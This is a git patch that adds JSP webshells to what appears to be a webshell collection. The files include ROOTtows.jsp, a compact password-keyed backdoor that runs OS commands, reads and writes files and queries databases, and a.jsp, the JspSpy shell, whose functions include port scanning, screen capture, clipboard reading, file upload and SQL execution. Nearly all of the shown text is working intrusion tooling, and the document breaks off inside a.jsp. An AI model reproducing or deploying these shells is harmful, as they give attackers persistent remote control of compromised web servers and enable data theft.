From 7fd6ddd0781ef7bdd71f9d83eb75c036191b1989 Mon Sep 17 00:00:00 2001 From: tennc Date: Thu, 27 Jun 2013 08:10:52 +0800 Subject: [PATCH] update jsp --- jsp/ROOTtows.jsp | 59 + jsp/a.jsp | 2328 +++++++++++++++++++++++++++++++++ jsp/customize.jsp | 297 +++++ jsp/edit_ot.jsp | 59 + jsp/he1p.jsp | 2344 ++++++++++++++++++++++++++++++++++ jsp/info.jsp | 59 + jsp/mg.jsp | 59 + jsp/utils.jsp | 297 +++++ jsp/zx.jsp | 3 + php/phpspy/2013未加密.php | 78 +- 10 files changed, 5544 insertions(+), 39 deletions(-) create mode 100644 jsp/ROOTtows.jsp create mode 100644 jsp/a.jsp create mode 100644 jsp/customize.jsp create mode 100644 jsp/edit_ot.jsp create mode 100644 jsp/he1p.jsp create mode 100644 jsp/info.jsp create mode 100644 jsp/mg.jsp create mode 100644 jsp/utils.jsp create mode 100644 jsp/zx.jsp diff --git a/jsp/ROOTtows.jsp b/jsp/ROOTtows.jsp new file mode 100644 index 0000000..bdffe4e --- /dev/null +++ b/jsp/ROOTtows.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="hkmjj"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/a.jsp b/jsp/a.jsp new file mode 100644 index 0000000..68f1ca3 --- /dev/null +++ b/jsp/a.jsp @@ -0,0 +1,2328 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "mr.wei"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
"); +str = str.replace("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
"); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
" + msg; +out.write("
"+msg+"
"); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

Remote Control »

"+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Timeout (秒) : "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
"); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +out.println("
"+ +"

Run SQL query/queries on database :

"); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

affected rows : "+obj+"

"); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +"

Password: "+ +" "+ +" "+ +" "+ +"

"+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
"); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

